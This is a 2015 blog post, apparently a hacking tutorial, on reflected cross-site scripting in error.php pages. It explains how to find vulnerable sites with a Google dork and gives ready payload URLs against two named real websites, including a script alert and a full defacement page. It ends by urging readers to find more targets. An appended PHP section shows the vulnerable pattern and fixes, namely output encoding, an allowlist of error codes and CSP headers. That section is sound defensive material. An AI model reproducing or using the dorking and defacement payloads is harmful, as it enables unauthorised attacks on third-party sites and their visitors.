Monday, 28 September 2015

error.php XSS (Cross-Site Scripting) Vulnerabilities


Title : error.php XSS
Risk : Cross-site scripting, cookie grabbing
PoC : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi
Browser : Mozilla Firefox

Let's start: go to Google, and say hello to Google!
Now type the dork "inurl:error.php?error=".
In the search results, ignore all the extra results with a different URL, like error-php-error.php.
Pick only a site with a URL of the form www.site.com/error.php?error=
Now type your first tag to check for the vulnerability.
Example: www.site.com/error.php?error=<h1>Test</h1>
If the page shows the word "Test" rendered as a header tag, it is vulnerable: the value of the error parameter is being written into the page's HTML without encoding.
I got this website from the search results, so now see some examples:
To show a header
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>
To show a header in the center
http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>
To show a title
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>
To add an image
http://www.sacareerfocus.co.za/error.php?error=<img src="http://3.bp.blogspot.com/-EtkPBc32dF0/UIgFEjw-cuI/AAAAAAAABGM/eIdp8Qg0hUg/s640/cats.jpg"/>
To add a message
http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>
To write a message across several lines
http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 
To add scrolling text
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>
To add an alert box
http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>
To add a background colour to the page
http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>
To add a full deface page
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>
<marquee><b>www.devilscafe.in</b></marquee>

You can add more HTML and JavaScript tags here.
Here is another demo site:
http://europeanvaluepartneradvisors.com/error.php?error=<center><h1>www.devilscafe.in</h1></center>
Find more websites with dorks :)
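
Why the tags above render, seen from the server side, and two ways to stop it. This is an added example, not code from any site named in this post: the vulnerable handler is an assumed reconstruction of a typical error.php, and the function names and message codes are hypothetical.

```php
<?php
// Added example: hypothetical error.php handlers, not taken from any real site.

// Vulnerable pattern (assumed): the parameter is concatenated into the page
// unchanged, so the browser parses any markup supplied in ?error=.
function render_error_vulnerable(array $query): string
{
    $msg = $query['error'] ?? '';
    return '<div class="error">' . $msg . '</div>';
}

// Fix 1: treat the value as text and encode it for the HTML body context.
function render_error_escaped(array $query): string
{
    $msg = $query['error'] ?? '';
    if (!is_string($msg)) {          // ?error[]=x arrives as an array
        $msg = '';
    }
    $safe = htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="error">' . $safe . '</div>';
}

// Fix 2 (preferred): accept only a short code and look the text up
// server-side, so no request data reaches the page at all.
const ERROR_MESSAGES = [              // hypothetical codes
    'not_found'    => 'Page not found.',
    'forbidden'    => 'Access denied.',
    'login_failed' => 'Invalid user name or password.',
];

function render_error_allowlist(array $query): string
{
    $code = $query['error'] ?? '';
    $text = 'An error occurred.';     // generic fallback for unknown codes
    if (is_string($code) && array_key_exists($code, ERROR_MESSAGES)) {
        $text = ERROR_MESSAGES[$code];
    }
    return '<div class="error">' . $text . '</div>';
}

// Defence in depth: a restrictive CSP blocks inline script even if an
// encoding step is missed somewhere else in the application.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");
header('X-Content-Type-Options: nosniff');

echo render_error_allowlist($_GET);
```

With either fix, a request such as error.php?error=<h1>Test</h1> shows the literal text (fix 1) or the generic fallback message (fix 2) instead of a rendered heading.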